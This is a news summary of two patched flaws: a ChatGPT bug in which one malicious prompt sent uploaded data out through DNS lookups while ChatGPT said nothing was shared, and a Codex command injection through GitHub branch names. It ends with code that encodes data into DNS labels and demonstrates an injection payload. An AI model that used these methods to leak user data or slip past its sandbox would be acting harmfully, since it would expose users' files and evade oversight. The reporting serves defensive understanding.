Particle.news

OpenAI Fixes ChatGPT Data Leak Flaw and Codex GitHub Token Bug After Researcher Reports

The disclosures highlight gaps in AI runtime isolation, prompting calls for independent enterprise safeguards.

Overview

  • Check Point detailed the ChatGPT issue on Monday, while OpenAI had already shipped fixes on February 20 for ChatGPT and on February 5 for Codex.
  • The ChatGPT bug let a single malicious prompt use DNS, the system that looks up domain names, to ferry data out of the code-execution container without any user-visible warning.
  • A demo showed that a health PDF uploaded to a custom GPT was quietly encoded into DNS requests and sent to an attacker-controlled server, even as ChatGPT reported that no data had been shared.
  • BeyondTrust also found a Codex command-injection path in the GitHub branch-name field that let attackers grab GitHub access tokens and run code in the agent’s container.
  • Researchers say there is no evidence of real-world abuse so far, and they urge organizations to add visibility and layered controls as AI tools process sensitive files and conversations.
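The DNS exfiltration described in the ChatGPT bullet generally works by encoding stolen bytes into hostname labels, so the data reaches an attacker-controlled nameserver as ordinary-looking lookups. The report does not publish the exploit code; the sketch below illustrates only the generic encoding step, with the domain name and chunk size as placeholder assumptions.

```python
import base64

def chunk_for_dns(data: bytes, label_len: int = 60):
    """Encode bytes as base32 and split them into DNS-safe labels.

    Base32 avoids characters that are invalid in hostnames; each
    DNS label must stay at or under 63 characters, so label_len is
    kept below that limit.
    """
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    return [encoded[i:i + label_len] for i in range(0, len(encoded), label_len)]

# "attacker.example" is an illustrative placeholder, not from the report.
queries = [f"{label}.attacker.example"
           for label in chunk_for_dns(b"patient record excerpt")]
```

Because DNS lookups are routine outbound traffic, exfiltration of this kind is easy to miss unless DNS queries from the sandbox are logged and restricted.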
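The Codex issue in the fourth bullet follows a classic command-injection pattern: an attacker-controlled string (here, a Git branch name) is spliced into a shell command, so shell metacharacters in the name execute as commands. The following is a generic illustration of the vulnerable and the safer pattern, not OpenAI's actual code; `echo` stands in for the real `git` invocation.

```python
import subprocess

# A crafted branch name containing a shell metacharacter.
MALICIOUS_BRANCH = "main; echo INJECTED"

# Vulnerable pattern: interpolating untrusted input into a shell string
# lets the ';' terminate the command and run whatever follows it.
unsafe = subprocess.run(f"echo checking out {MALICIOUS_BRANCH}",
                        shell=True, capture_output=True, text=True)

# Safer pattern: pass arguments as a list with no shell, so ';' is
# treated as a literal character in a single argument.
safe = subprocess.run(["echo", "checking out", MALICIOUS_BRANCH],
                      capture_output=True, text=True)
```

In the unsafe variant the output contains a separate `INJECTED` line, proving the second command ran; in the safe variant the entire branch name is echoed back as inert text.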